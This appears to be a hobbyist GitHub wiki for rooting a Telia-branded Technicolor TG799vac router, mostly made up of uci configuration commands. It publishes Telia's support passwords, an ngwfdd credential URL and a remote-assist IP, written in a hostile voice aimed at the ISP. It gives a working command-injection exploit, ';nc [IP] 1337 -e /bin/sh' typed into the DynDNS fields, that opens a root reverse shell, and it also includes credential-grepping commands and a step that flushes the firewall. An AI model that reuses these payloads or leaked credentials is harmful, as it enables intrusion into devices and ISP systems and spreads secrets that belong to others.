TG799VAC-XTREME-17.2-MINT

My personal wiki for hacking the firmware of the Telia-branded TG799vac Xtreme v17.2-MINT router, delivered by Technicolor

View the Project on GitHub wuseman/TG799VAC-XTREME-17.2-MINT

# TG799VAC-XTREME-17.2-MINT

wuseman edition

Latest firmware with full root access

Autism in all its glory, the greatest credit goes to our friend: weaponizedautism

https://weaponizedautism.wordpress.com/2017/07/14/vulnerabilities-in-technicolor-adsl-residential-gateways

Msg to TeliaCompany AB: This is because you blacklisted me, morons.

I will expose every setting, every IP and every key I can find until they remove the backdoors. Now I'm bored, so let's start. I really hate writing descriptions, and the faster you get this information, the faster you can protect yourself from the backdoors.

After my exposé of Telia's first password they changed it. What they did not think of: if they change the password and I still have root access, then I can grab their new password as well. Fail! lmao

Telia User-Agents:

IPTV.......: KreaTVWebKit/600 (Motorola STB; Linux; 5305)
SERVER.....: Apache-Coyote/1.1
CISCO......: Wget
WEB........:

Telia's default passwords for Technicolor devices:

Old.......: _T3L1a!SuPPor7
New.......: SUPP0r7!W1f1R0uT3r
Remote IP.: 131.116.22.242 (uci show mwan.remoteassist.dest_ip)

Shell password:

Login.....: root
Password..: root

Assistance password:

Port......: 60443 (uci get web.remote.port)
Login.....: assistance (uci get web.remote)
Password..: random
Interface.: mgmt (uci get web.remote.interface)
Enable....: uci set web.remote.active=1
Disable...: uci set web.remote.active=0

Ngwfdd:

Login.........: telia
Password......: ZDgFbBH5jQvUocL7
URL...........: https://telia:ZDgFbBH5jQvUocLZDgFbBH5jQvUocL7@telia-gw.tgwfd.org:8443/
Via shell.....: uci get ngwfdd.config.base_url
Cisco.........: https://cisco.nr1.nu/
Sagemcom......: https://sagemcom.nr1.nu/
Technicolor0..: https://technicolor.nr1.nu/
Technicolor1..: https://github.com/wuseman/TG799vnv2-10.5.1.Q-SMART-3.6.1
Technicolor2..: https://github.com/wuseman/TG799VAC-XTREAM-V16.2-JADE

Boards

Telia - Board: VANT-W

Screenshot

Download URLS:

https://wuseman.nr1.nu/firmwares/technicolor/VANT-W_Telia/172339w1441004closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VANT-W_Telia/172339w1441020closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VANT-W_Telia/172405w1441030closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VANT-W_Telia/1627732w2221002closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VANT-W_Telia/15516436w1361002closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VANT-W_Telia/15516436w1361005closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VANT-W_Telia/15516436w1361006closed.rbi

Telia - Board: VANT-R

Screenshot

Download URLS:

https://wuseman.nr1.nu/firmwares/technicolor/VANT-R_Telia/172339r1021008closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VANT-R_Telia/172339r1021022closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VANT-R_Telia/172405r1021034closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VANT-R_Telia/1627732r2221004closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VANT-R_Telia/15516436r1361008closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VANT-R_Telia/telia-vant-r_15.51.6436-1361003-bank_dump.xz

Telia - Board: VBNT-H

Screenshot

Download URLS:

https://wuseman.nr1.nu/firmwares/technicolor/VBNT-H_Telia/172339h1441002closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VBNT-H_Telia/172405h1441028closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VBNT-H_Telia/1627732h2221002closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VBNT-H_Telia/172339h1441018closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VBNT-H_Telia/172405h1441042closed.rbi (latest)

Telia - Board: VDNT-O

Screenshot

Download URLS:

https://wuseman.nr1.nu/firmwares/technicolor/VDNT-O_Telia/172339o1901024closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VDNT-O_Telia/1627732o2221004closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VDNT-O_Telia/1720405o1901012closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VDNT-O_Telia/15516436o1361004closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VDNT-O_Telia/telia-vdnt-o_10.5.1.Q-bank_dump.xz

To stop the ISP from pushing firmware upgrades over TR-069 (cwmpd), run the commands below as soon as you have a shell (no longer needed since their ACS server was shut down):

uci set cwmpd.cwmpd_config.state=0
uci commit cwmpd
rm /etc/cwmp*

Add your ssh key:

ssh root@192.168.1.1 "tee -a /etc/dropbear/authorized_keys" < ~/.ssh/id_rsa.pub

Get the CSRF token via the CLI:

curl -sL http://192.168.1.1/login.lp?action=getcsrf

Get the CSRF token via your browser's developer console:

/* Open your preferred browser, press F12, go to the Console tab and paste: */
$("meta[name=CSRFtoken]").attr("content")

To upgrade the firmware, type:

sysupgrade --safe -o /tmp/172339o1901024closed.rbi

Get access to all cards on the latest firmware:

/etc/init.d/nginx restart

Screenshot

SSH

SHORT VERSION

Screenshot

Copy and paste all of this into the DynDNS fields in the web GUI (edit the IP):
::::::;nc 192.168.1.144 1337 -e /bin/sh

LONG VERSION:

Screenshot

Let's begin. Fire up a terminal of any kind, run the awesome netcat tool and listen on a port:

nc -lvvp 1337

Go to WAN Services and press SHOW ADVANCED. Type the command below into the username, password and domain fields, then enable DynDNS. It does not matter which provider you choose, just pick one, press save and wait 4-5 seconds. The field values are passed to a shell without escaping, so the `;` ends the DynDNS command and the `nc` after it runs as root: you now have full root access to your TG799VAC Xtreme 17.2 Mint (check the preview video above if you do not understand).

:::::::;nc [machine_IP] 1337 -e /bin/sh

You will see something similar to this; if you do, you have root access (type `ls /` for example):

listening on [any] 1337 ...
connect to [192.168.1.144] from router [192.168.1.1] 40980

Now let us enable SSH on the LAN and lock the ISP-facing instances down. Copy and paste the following into the reverse shell:

# ISP-facing dropbear instances (mgmt/wan): key-only, restricted to Telia's remote-assist IP, and disabled
uci set dropbear.mgmt.PasswordAuth=off
uci set dropbear.mgmt.RootPasswordAuth=off
uci set dropbear.mgmt.Port=22
uci set dropbear.mgmt.Interface=mgmt
uci set dropbear.mgmt.AllowedClientIPs=131.116.22.242/32
uci set dropbear.mgmt.enable=0
uci set dropbear.wan.PasswordAuth=off
uci set dropbear.wan.RootPasswordAuth=off
uci set dropbear.wan.Port=22
uci set dropbear.wan.Interface=wan
uci set dropbear.wan.AllowedClientIPs=131.116.22.242/32
uci set dropbear.wan.enable=0
# LAN-facing dropbear instance: the one we log in to
uci set dropbear.lan=dropbear
uci set dropbear.lan.PasswordAuth=on
uci set dropbear.lan.RootPasswordAuth=on
uci set dropbear.lan.Interface=lan
uci set dropbear.lan.IdleTimeout=3600
uci set dropbear.lan.enable=1
uci set dropbear.lan.Port=22
uci set dropbear.lan.AllowedClientIPs=192.168.1.0/24   # /24: a /32 here would only match the network address itself
uci set wireless.global.station_history_persistent=1
uci commit
# Let the admin role see the cards that are restricted to the telia/engineer roles
sed -i 's/role == "telia"/role == "admin"/g' /www/docroot/modals/*
sed -i 's/role == "engineer"/role == "admin"/g' /www/docroot/modals/firewall-modal.lp
# Add the admin role to every web rule that lacks it (generated add_list commands are fed straight to sh),
# then allow admin to upgrade firmware
uci show | grep '\.roles' | grep -v admin | cut -d'=' -f1 | sed 's/^/uci add_list /; s/$/=admin/' | sh
uci set web.uidefault.upgradefw_role=admin
uci commit
/etc/init.d/nginx restart
/etc/init.d/dropbear restart
echo "All done, refresh :)"
exit

Then, on your own machine, add your public key to the router: cat ~/.ssh/*.pub, ssh in as root and paste it into /etc/dropbear/authorized_keys (or use the tee one-liner above).

Now ssh into your router:

ssh root@192.168.1.1

Screenshot

Banner (default)

Screenshot

Once you have root on the router you can unlock rootfs_data and install a far more powerful GUI than Telia's original, thanks to Ansuel and other awesome developers, with the commands below. Note that -k skips TLS certificate verification and the archive is unpacked straight over / as root, so fetch it on your PC first and check it against a hash you trust before extracting it on the router:

curl -k https://repository.ilpuntotecnico.com/files/Ansuel/AGTEF/GUI.tar.bz2 --output /tmp/GUI.tar.bz2
bzcat /tmp/GUI.tar.bz2 | tar -C / -xvf -
/etc/init.d/rootdevice force
reboot

Now visit http://192.168.1.1 and you will see a brand new GUI. Default login: username admin, password admin.

This is how it looks after running the above commands:

Screenshot

Stats view:

Screenshot

Telstra Extension:

Screenshot

This is an example of the default setup with more Lua cards:

Screenshot

LuCI can also be installed (not supported by the above package yet):

Screenshot

Do you look forward to upgrading your firmware without any third-party software and without any backdoors from your ISP? Great, I will show you how to do it easier than ever.

Add the Administrator role to the roles allowed to upgrade firmware:

uci add_list web.uidefault.upgradefw_role='admin'
uci commit

If you try the commands below you will know how it feels to work for Telia support ;)

Screenshot

uci set web.usr_Administrator.role='superuser'
uci set web.usr_Administrator.role='telia'

Screenshot

Add your own user without any extra tools:

Screenshot

Add a new user with clash:

![screenshot](files/clash-adduser.gif)

clash newsrpuser -u <wuseman> -p <password>

uci set web_back.usr_wuseman=user
uci set web_back.usr_wuseman.name='wuseman'
uci set web_back.usr_wuseman.role='wuseman'
uci set web_back.usr_wuseman.gak_id='1'
uci set web_back.usr_wuseman.srp_salt='D0124225'
uci add_list web_back.default.users='usr_wuseman'
uci set web_back.uidefault.defaultuser='wuseman'

cat << "EOF" >> /etc/config/web
config user 'usr_wuseman'
    option name 'wuseman'
    option password_reminder '0'
    option srp_verifier '<srp_verifier printed by clash>'
    option srp_salt 'D0124225'
EOF
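The srp_salt/srp_verifier pair that ends up in /etc/config/web is an SRP verifier: the router stores the salt and v = g^x mod N, never the password, and a full SRP-6a exchange is what the web login runs. The Python below is an added example, not the firmware's or clash's code. It assumes the RFC 5054 1024-bit group with g = 2 and SHA-256 for every hash; the group, hash and byte encoding the firmware really uses are not established on this page, so the numbers it prints will not match what `clash newsrpuser` writes. The point it shows is the protocol: enrolment produces (salt, v), the two sides only exchange A and B, and a client with the wrong password ends up with a different session key.

```python
import hashlib
import secrets

# ASSUMPTION: RFC 5054 Appendix A 1024-bit group, g = 2, SHA-256 throughout.
N = int(
    "EEAF0AB9ADB38DD69C33F80AFA8FC5E86072618775FF3C0B9EA2314C"
    "9C256576D674DF7496EA81D3383B4813D692C6E0E0D5D8E250B98BE4"
    "8E495C1D6089DAD15DC7D7B46154D6B6CE8EF4AD69B15D4982559B29"
    "7BCF1885C529F566660E57EC68EDBC3C05726CC02FD4CBF4976EAA9A"
    "FD5138FE8376435B9FC61D2FC0EB06E3", 16)
g = 2
NLEN = (N.bit_length() + 7) // 8


def H(*parts):
    """SHA-256 over the concatenated byte strings, as an integer."""
    return int.from_bytes(hashlib.sha256(b"".join(parts)).digest(), "big")


def pad(n):
    return n.to_bytes(NLEN, "big")


k = H(pad(N), pad(g))  # SRP-6a multiplier


def private_x(username, password, salt):
    # x = H(salt | H(username ":" password)), RFC 5054 section 2.4
    inner = hashlib.sha256(f"{username}:{password}".encode()).digest()
    return H(salt, inner)


def make_verifier(username, password, salt=None):
    """Enrolment: what gets stored is (salt, v = g^x mod N), never the password."""
    if salt is None:
        salt = secrets.token_bytes(4)  # srp_salt above is 8 hex chars, i.e. 4 bytes
    return salt, pow(g, private_x(username, password, salt), N)


def client_start():
    a = secrets.randbits(256)
    return a, pow(g, a, N)  # ephemeral (a, A); only A goes on the wire


def server_start(v):
    b = secrets.randbits(256)
    return b, (k * v + pow(g, b, N)) % N  # ephemeral (b, B); only B goes on the wire


def client_session_key(username, password, salt, a, A, B):
    if B % N == 0:
        raise ValueError("invalid server value B")
    u = H(pad(A), pad(B))
    x = private_x(username, password, salt)
    S = pow((B - k * pow(g, x, N)) % N, a + u * x, N)
    return hashlib.sha256(pad(S)).digest()


def server_session_key(v, b, A, B):
    if A % N == 0:
        raise ValueError("invalid client value A")
    u = H(pad(A), pad(B))
    S = pow((A * pow(v, u, N)) % N, b, N)
    return hashlib.sha256(pad(S)).digest()


def run_exchange(username, password, attempt):
    """Enrol with `password`, then log in with `attempt`; True iff both sides derive the same key."""
    salt, v = make_verifier(username, password)
    a, A = client_start()
    b, B = server_start(v)
    return client_session_key(username, attempt, salt, a, A, B) == server_session_key(v, b, A, B)


if __name__ == "__main__":
    salt, v = make_verifier("wuseman", "password", bytes.fromhex("D0124225"))
    print("srp_salt    ", salt.hex().upper())
    print("srp_verifier", format(v, "x"))
    print("correct password:", run_exchange("wuseman", "password", "password"))
    print("wrong password:  ", run_exchange("wuseman", "password", "guess"))
```

Because only v is stored, reading /etc/config/web does not hand an attacker the password, but it does let them run an offline dictionary attack against the 4-byte salt and verifier, which is why a 16-character random password like the one clash generates matters.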

Create a user for minitr064d:

computeHA1 -u <username> -p <password> -r
Self test passed - HA1 computation reliable
Self test passed - authentication check reliable

Computing hash for <username>:minitr064d:<password>
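The hash computeHA1 prints is the HTTP Digest HA1 from RFC 2617, MD5(username:realm:password), with minitr064d as the realm. The Python below is an added example (not computeHA1's or minitr064d's code) that computes HA1 and plays both sides of a Digest exchange: the server only holds HA1, and a client that has stolen HA1 from the config file can authenticate without ever learning the password. The nonce handling (single-use nonces) is a simplification assumed for the example.

```python
import hashlib
import secrets

REALM = "minitr064d"  # the realm computeHA1 shows above: <username>:minitr064d:<password>


def md5hex(s):
    return hashlib.md5(s.encode()).hexdigest()


def compute_ha1(username, password, realm=REALM):
    """HA1 = MD5(username:realm:password), RFC 2617 3.2.2.2; all the daemon needs to store."""
    return md5hex(f"{username}:{realm}:{password}")


def digest_response(ha1, method, uri, nonce, nc, cnonce, qop="auth"):
    """The response= value a client sends for qop=auth."""
    ha2 = md5hex(f"{method}:{uri}")
    return md5hex(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")


class DigestVerifier:
    """Server side: keeps HA1 per user, hands out nonces, checks responses."""

    def __init__(self):
        self.ha1_by_user = {}
        self.live_nonces = set()

    def add_user(self, username, password):
        self.ha1_by_user[username] = compute_ha1(username, password)

    def challenge(self):
        nonce = secrets.token_hex(16)
        self.live_nonces.add(nonce)
        return nonce

    def verify(self, username, method, uri, nonce, nc, cnonce, response):
        if nonce not in self.live_nonces:
            return False  # unknown or already-used nonce: replay
        ha1 = self.ha1_by_user.get(username)
        if ha1 is None:
            return False
        expected = digest_response(ha1, method, uri, nonce, nc, cnonce)
        ok = secrets.compare_digest(expected, response)
        if ok:
            self.live_nonces.discard(nonce)  # single use per nonce in this example
        return ok


def attempt(server, username, ha1, method="GET", uri="/"):
    """Client side: get a nonce, answer the challenge from HA1 only."""
    nonce = server.challenge()
    cnonce = secrets.token_hex(8)
    response = digest_response(ha1, method, uri, nonce, "00000001", cnonce)
    return server.verify(username, method, uri, nonce, "00000001", cnonce, response)


def demo():
    server = DigestVerifier()
    server.add_user("wuseman", "password")
    good = attempt(server, "wuseman", compute_ha1("wuseman", "password"))
    bad = attempt(server, "wuseman", compute_ha1("wuseman", "wrong"))
    # Whoever reads HA1 out of the config never needs the password: pass-the-hash
    stolen = attempt(server, "wuseman", server.ha1_by_user["wuseman"])
    # Replaying a captured response against the same nonce fails
    nonce = server.challenge()
    resp = digest_response(server.ha1_by_user["wuseman"], "GET", "/", nonce, "00000001", "deadbeef")
    first = server.verify("wuseman", "GET", "/", nonce, "00000001", "deadbeef", resp)
    replay = server.verify("wuseman", "GET", "/", nonce, "00000001", "deadbeef", resp)
    return good, bad, stolen, first, replay


if __name__ == "__main__":
    print("password ok, wrong password, stolen HA1, first use, replay:", demo())
```

Treat the HA1 line in the config as password-equivalent: it is enough to log in, so protect and rotate it like the password itself.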

OpenVPN client:

I prefer WireGuard, but for OpenVPN see below.

Install the required packages:

opkg update
opkg install openvpn-openssl openssl-util

Configs - network:

uci set network.vpnclient="interface"
uci set network.vpnclient.ifname="tun0"
uci set network.vpnclient.proto="none"
uci commit network; service network restart

Configs - firewall (the zone's network entry must match the interface name defined above):

uci add firewall zone
uci set firewall.@zone[-1].name="vpnclient"
uci add_list firewall.@zone[-1].network="vpnclient"
uci set firewall.@zone[-1].input="REJECT"
uci set firewall.@zone[-1].output="ACCEPT"
uci set firewall.@zone[-1].forward="REJECT"
uci set firewall.@zone[-1].masq="1"
uci set firewall.@zone[-1].mtu_fix="1"
uci add firewall forwarding
uci set firewall.@forwarding[-1].src="lan"
uci set firewall.@forwarding[-1].dest="vpnclient"
uci commit firewall; service firewall restart

Setup OpenVPN client:

uci set openvpn.vpnclient="openvpn"
uci set openvpn.vpnclient.enabled="1"
uci set openvpn.vpnclient.config="/etc/openvpn/vpnclient.ovpn"
uci commit openvpn; service openvpn restart

OPKG

With the settings below you can install packages from more repos. Note that this overwrites /etc/opkg.conf (back it up first: cp /etc/opkg.conf /etc/opkg.conf.orig) and that the feeds come from an end-of-life release over plain HTTP, so treat anything installed from them accordingly:

cat << "EOF" > /etc/opkg.conf
arch all 1
arch noarch 1
arch brcm63xx 3
arch brcm63xx-tch 10
EOF
cat << "EOF" >> /etc/opkg/distfeeds.conf
src/gz chaos_calmer http://archive.openwrt.org/chaos_calmer/15.05.1/brcm63xx/smp/packages/base
src/gz luci http://archive.openwrt.org/chaos_calmer/15.05.1/brcm63xx/smp/packages/luci
src/gz management http://archive.openwrt.org/chaos_calmer/15.05.1/brcm63xx/smp/packages/management
src/gz routing http://archive.openwrt.org/chaos_calmer/15.05.1/brcm63xx/smp/packages/routing
src/gz packages http://archive.openwrt.org/chaos_calmer/15.05.1/brcm63xx/smp/packages/packages
src/gz telephony http://archive.openwrt.org/chaos_calmer/15.05.1/brcm63xx/smp/packages/telephony
EOF

TFTP

Recovery via TFTP:

Client side:

Switch the device off (or pull the power cord). Connect a client to LAN1 via Ethernet, then trigger the rescue function by pressing and holding the reset button while turning the device on (or plugging the power cord back in). You can release the reset button after a few seconds.

The device takes ~15-20 seconds to boot a mini web server that provides a single function: upload a firmware file and press a button to trigger the flash process. The web server is usually available at

http://192.168.1.1

Install atftpd on a Gentoo machine (OpenRC):

emerge --sync; emerge -a atftpd
mkdir /mnt/tftp
cp <firmware.bin> /mnt/tftp/
chown nobody:nogroup -R /mnt/tftp
cat << "EOF" > /etc/conf.d/atftp
TFTPD_ROOT="/mnt/tftp"
TFTPD_OPTS="--daemon --user nobody --group nobody"
EOF
/etc/init.d/atftpd start

That's it. getent only confirms that the tftp port is defined in /etc/services; use ss -ulnp | grep ':69' to see that the daemon is actually listening:

getent services tftp

Server side (router):

uci set dhcp.dnsmasq.enable_tftp='1'

First set a static IP on your client so it can talk to the router (use your own interface name):

ifconfig eth0 192.168.1.2 netmask 255.255.255.0 up
route add default gw 192.168.1.1
echo "nameserver 192.168.1.1" > /etc/resolv.conf
tcpdump -i eth0 -vvv -s 0 port bootps

When the TG799 router sends BOOTP, run:

atftp --trace --option "timeout 1" --option "mode octet" --put --local-file tg799bin.firmware.rbi 192.168.1.1

Got stuck with some packages that say "error opening terminal"? No worries, this is caused by a missing terminfo entry for your terminal type; run the commands below to fix the xterm problem:

Screenshot

export TERM=linux
export TERMINFO=/etc/terminfo

Run uci-whois.sh from the scripts dir to whois all IPs your ISP added in the various settings:

Screenshot

Mount root read-write:

mount -o remount,rw /

If you are lazy and want things sorted as I do, run the commands below:

Screenshot

mkdir -p /tmp/uci_sorted
cd /tmp/uci_sorted

# one file per uci package (quoting the command substitution would make the loop run once over the whole list)
for uci_package in $(uci show | awk -F. '{print $1}' | sort -u); do
    uci show "$uci_package" > "/tmp/uci_sorted/$uci_package"
done

List all files under /etc where "password=" appears:

grep -r -iE 'password=' /etc

List all files containing your serial:

grep -rl 'SERIAL' .

Turning off Power-Saving features

pwrctl config --cpuspeed 0
pwrctl config --wait off
pwrctl config --ethapd off
pwrctl config --eee off
pwrctl config --autogreeen off

For users missing the VPN card in the web GUI, run the commands below (if the modal is missing from /rom too, it is in the modals dir of this repo):

Screenshot

cp /rom/www/docroot/modals/l2tp-ipsec-server-modal.lp /www/docroot/modals/

Then register it as a web rule. The `list rules` entry has to sit in the ruleset_main section, so use uci instead of appending raw lines to /etc/config/web:

uci set web.l2tpipsecservermodal=rule
uci set web.l2tpipsecservermodal.target='/modals/l2tp-ipsec-server-modal.lp'
uci add_list web.l2tpipsecservermodal.roles='admin'
uci add_list web.l2tpipsecservermodal.roles='engineer'
uci add_list web.ruleset_main.rules='l2tpipsecservermodal'
uci commit web
/etc/init.d/nginx restart

Set up your DDNS provider from the command line. Note that cacert 'IGNORE' disables TLS certificate verification for the update request; point it at a CA bundle or directory on the router instead if you have one:

cat << "EOF" > /etc/config/ddns
config service 'myddns_ipv4'
    option interface 'wan'
    option ip_source 'network'
    option ip_network 'wan'
    option use_https '1'
    option cacert 'IGNORE'
    option force_interval '36500'
    option force_unit 'days'
    option enabled '1'
    option password 'password'
    option username 'domain.com'
    option service_name 'loopia.se'
    option lookup_host 'domain.com'
    option domain 'domain.com'
EOF

Set up domain names (static DNS entries):

Example 1 - file method

cat << "EOF" >> /etc/config/dhcp
config domain
    option name 'github'
    option ip '192.30.253.112'
EOF

Example 2 - uci method

uci add dhcp domain
uci set dhcp.@domain[-1].name='github'
uci set dhcp.@domain[-1].ip='192.30.253.112'
uci commit dhcp
/etc/init.d/dnsmasq restart

Port forwarding

Example 1 - file method (append with >>; a single > would wipe the whole firewall config)

cat << "EOF" >> /etc/config/firewall
config userredirect 'userredirectXXDD'
    option dest_port '<PORTNUMBER>'
    option dest 'lan'
    option src 'wan'
    list proto '<tcp|udp|tcpudp>'
    option enabled '<1|0>'
    option name 'CUSTOMNAMEINWEBINTERFACE'
    option src_dport '<PORTNUMBER>'
    option family '<ipv4|ipv6>'
    option target 'DNAT'
    option dest_ip '<lanip>'
EOF

Example 2 - uci method

uci set firewall.userredirect4320=userredirect
uci set firewall.userredirect4320.family='<ipv4|ipv6>'
uci set firewall.userredirect4320.enabled='1'
uci set firewall.userredirect4320.target='DNAT'
uci set firewall.userredirect4320.src='wan'
uci set firewall.userredirect4320.dest='lan'
uci set firewall.userredirect4320.dest_port='<port>'
uci set firewall.userredirect4320.name='nameyourforwarding'
uci set firewall.userredirect4320.src_dport='<port>'
uci set firewall.userredirect4320.dest_ip='<lanip>'   # use 0.0.0.0 together with dest_mac if you do not use static leases
uci set firewall.userredirect4320.dest_mac='<macaddr>'
uci add_list firewall.userredirect4320.proto='<tcp|udp|tcpudp>'
uci commit firewall
/etc/init.d/firewall reload

Disable UPnP:

uci set minitr064d.config=minitr064d
uci set minitr064d.config.enable_upnp='0'
uci set minitr064d.config.log_output='0'
uci set minitr064d.config.internal_iface='lan'
uci set minitr064d.config.port='0'
uci set minitr064d.config.manufacturer_url=''
uci set minitr064d.config.model_url=''
uci set minitr064d.config.model_description='main router'
uci set minitr064d.config.model_number='tg799vac xtream router'
uci set minitr064d.config.friendly_name='tg799vac xtream router'
uci set minitr064d.config.manufacturer_name='tg799vac xtream router'
uci set minitr064d.config.model_name='technicolor'

Environment settings:

uci set env.var.aria2_webui='0'
uci set env.var.luci_webui='0'
uci set env.var.transmission_webui='0'
uci set env.var.xupnp_app='0'
uci set env.var.blacklist_app='0'
uci set env.var.new_ver='only god knows'
uci set env.rip.sfp='1'

List all URLs for your firmware that can be downloaded (won't work on Telia's firmware; did you find the key? Please contact me then):

strings /etc/cwmpd.db
    SQLite format 3
    tabletidkvtidkv
    CREATE TABLE tidkv (  type TEXT NOT NULL,  id TEXT NOT NULL,  key TEXT NOT NULL,  value TEXT,  PRIMARY KEY (type, id, key)))
    indexsqlite_autoindex_tidkv_1tidkv
    transferPassword5
    transfer Username
    Stransfer URLhttp://192.168.21.52:7547/ACS-server
    5transferaStartTime2018-08-19T15:20:13Z
    transfera FaultStringcomplete
    transfera FaultCode0M_
    M%5transfera CompleteTime2018-08-19T15:19:57Z
    'transfera TimeStamp244,9XXXXXX
    transfera DelaySeconds3
    transfera Password
    transfera Username
    runtimevarParameterKey#
    runtimevarConfigurationVersionD
    %_runtimevarBootStrappedhttps://acs.telia.com:7575/ACS-server/ACS-
     +/VersionsSoftwareVersion16.2.XXXXXX
    transfer FaultString
    transfer FaultCode
    transfer TimeSt6
    transfera UsernameU
    transfera URLT7
    transfera TimeStampX
    transfera SubStatec
    transfera Stateb7
    transfera StartTimed
    transfera PasswordV

List network devices:

awk '{print $1}' /proc/net/dev

To get a fresh network configuration on your client system you can remove all IP addresses with:

ip addr flush dev <device>

Disable all firewall rules temporarily (this exposes every service on the router to the WAN side until you run /etc/init.d/firewall restart):

iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT
iptables -t nat -F
iptables -t mangle -F
iptables -F
iptables -X

Changing max sync speed on your modem:

uci set xdsl.dsl0.maxaggrdatarate='200000' # 16000 default
uci set xdsl.dsl0.maxdsdatarate='140000'   # 11000 default
uci set xdsl.dsl0.maxusdatarate='60000'    # 40000 default

Enable or disable the DHCP server on the LAN interface ('1' = off; dnsmasq keeps serving DNS):

uci set dhcp.lan.ignore='1'

Enable or disable the NTP server:

uci set system.ntp.enable_server='1'

Check the currently used DNS servers with:

cat /etc/resolv.conf

Change the NSP link shown in the web GUI:

uci set web.uidefault.nsplink='https://sendit.nu'

This shows every listening TCP/UDP socket on your router, with the owning process:

netstat -tulnp

This shows all IPs with an established connection to your router right now:

netstat -lantp | grep ESTABLISHED | awk '{print $5}' | awk -F: '{print $1}' | sort -u

Capture traffic on all interfaces (add -i wl0 for include wifi):

tcpdump -vvv -ttt -p -U
tcpdump -i wl0 -vvv -ttt -p -U

Enable or Disable Content Sharing (Samba / DNLA)

uci set samba.samba.enabled='1'
uci set dlnad.config.enabled='1'

Take control over mwan:

uci set mwan.remoteassist=rule
uci set mwan.remoteassist.dest_ip='192.168.1.0/24'
uci set mwan.remoteassist.policy=''

To view current DHCP leases:

cat /tmp/dhcp.leases

To view all ipv4 adresses from uci settings:

uci show | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b"

clash showinfo cpu

 Processor     : ARMv7 Processor rev 1 (v7l)
 processor     : 0
 BogoMIPS    : 1990.65

 processor     : 1
 BogoMIPS    : 1990.65

 Features    : swp half thumb fastmult edsp tls
 CPU implementer : 0x41
 CPU architecture: 7
 CPU variant    : 0x4
 CPU part    : 0xc09
 CPU revision    : 1

 Hardware    : BCM963138
 Revision    : 0000
 Serial     : 0000000000000000
Enable or disable the remote (assistance) web GUI:

uci set web.remote.active='1'

List the MAC address of every interface:

ifconfig -a | sed '/eth\|wl/!d;s/ Link.*HWaddr//'
    eth0      X0:X0:X0:X0:X0:X0
    eth1      X0:X0:X0:X0:X0:X0
    eth2      X0:X0:X0:X0:X0:X0
    eth3      X0:X0:X0:X0:X0:X0
    eth4      X0:X0:X0:X0:X0:X0
    eth5      X0:X0:X0:X0:X0:X0
    vlan_eth0 X0:X0:X0:X0:X0:X0
    vlan_eth1 X0:X0:X0:X0:X0:X0
    vlan_eth2 X0:X0:X0:X0:X0:X0
    vlan_eth3 X0:X0:X0:X0:X0:X0
    vlan_eth5 X0:X0:X0:X0:X0:X0
    wl0       X0:X0:X0:X0:X0:X0
    wl0_1     X0:X0:X0:X0:X0:X0
    wl0_2     X0:X0:X0:X0:X0:X0

Various settings:

uci set dlnad.config.friendly_name='tg799vac xtream router'
uci set dlnad.config.model_name='tg799vac xtream router'
uci set dlnad.config.manufacturer_url=''
uci set dlnad.config.model_url=''
uci set env.var.company_name='technicolor'
uci set env.var.prod_friendly_name='tg799vac xtream router'
uci set env.var.variant_friendly_name='tg799tvac xtream router'
uci set env.var.prod_name='media'
uci set env.var.prod_description='main router'
uci set env.var.prod_number='tg799vac xtream router'
uci set env.var.isp='telia'
uci set mmdetectslic.non_voice_var.company_name='technicolor'

Remove the trafficmon settings (uci delete takes no value; deleting index 0 repeatedly removes every trafficmon section, and the web rule has to be taken out of ruleset_main as well):

while uci -q delete system.@trafficmon[0]; do :; done
uci del_list web.ruleset_main.rules='trafficmonitor'
uci delete web.trafficmonitor
uci commit

Send syslog to your own server instead of sending everything to Telia (it's insane that they want all of the stuff they filter by default):

uci set ledfw.syslog=syslog
uci set ledfw.syslog.trace='6'
uci set mmpbx.syslog=syslog
uci set mmpbx.syslog.service_config='1'
uci set mmpbx.syslog.service_actions='1'
uci set mmpbx.syslog.calls='1'
uci set mmpbx.syslog.syslog_priority='6'
uci set mmpbx.syslog.hide_user_identity='0'
uci set mmpbxbrcmdectdev.syslog=syslog
uci set mmpbxbrcmdectdev.syslog.phone='1'
uci set mmpbxbrcmdectdev.syslog.syslog_priority='6'
uci set mmpbxbrcmdectdev.syslog.syslog_hide_dialled_digits='1'
uci set mmpbxbrcmfxsdev.syslog=syslog
uci set mmpbxbrcmfxsdev.syslog.phone='1'
uci set mmpbxbrcmfxsdev.syslog.syslog_priority='6'
uci set mmpbxbrcmfxsdev.syslog.syslog_hide_dialled_digits='1'
uci set mmpbxrvsipnet.syslog=syslog
uci set mmpbxrvsipnet.syslog.registration='1'
uci set mmpbxrvsipnet.syslog.call_signalling='1'
uci set mmpbxrvsipnet.syslog.syslog_priority='6'
uci set mmpbxrvsipnet.syslog.log_sip_message='1'
uci set mmpbxrvsipnet.syslog.hide_user_identity='0'
uci set osgi.config.enable_syslog='1'
uci set siege.log.enable_syslog='1'
uci del_list web_back.syslogmodal.roles='telia'

Grab all program tags from log.txt (exported from the diagnostics tab) and insert the generated lines into /etc/config/system to log everything to your syslog server:

awk '{print $7}' log.txt | sed 's/://g' | sort -u | sed "s/^/        list log_filter '/; s/$/'/"

##### Settings for syslog

By uci:

```sh
uci set system.@system[0].log_port='514'
uci show system.@system[0].log_port
uci show system.@system[0].log_filter_ip
```

Via system file:

cat << "EOF" > /etc/config/system
config system

    option log_filter_ip '192.168.1.208'
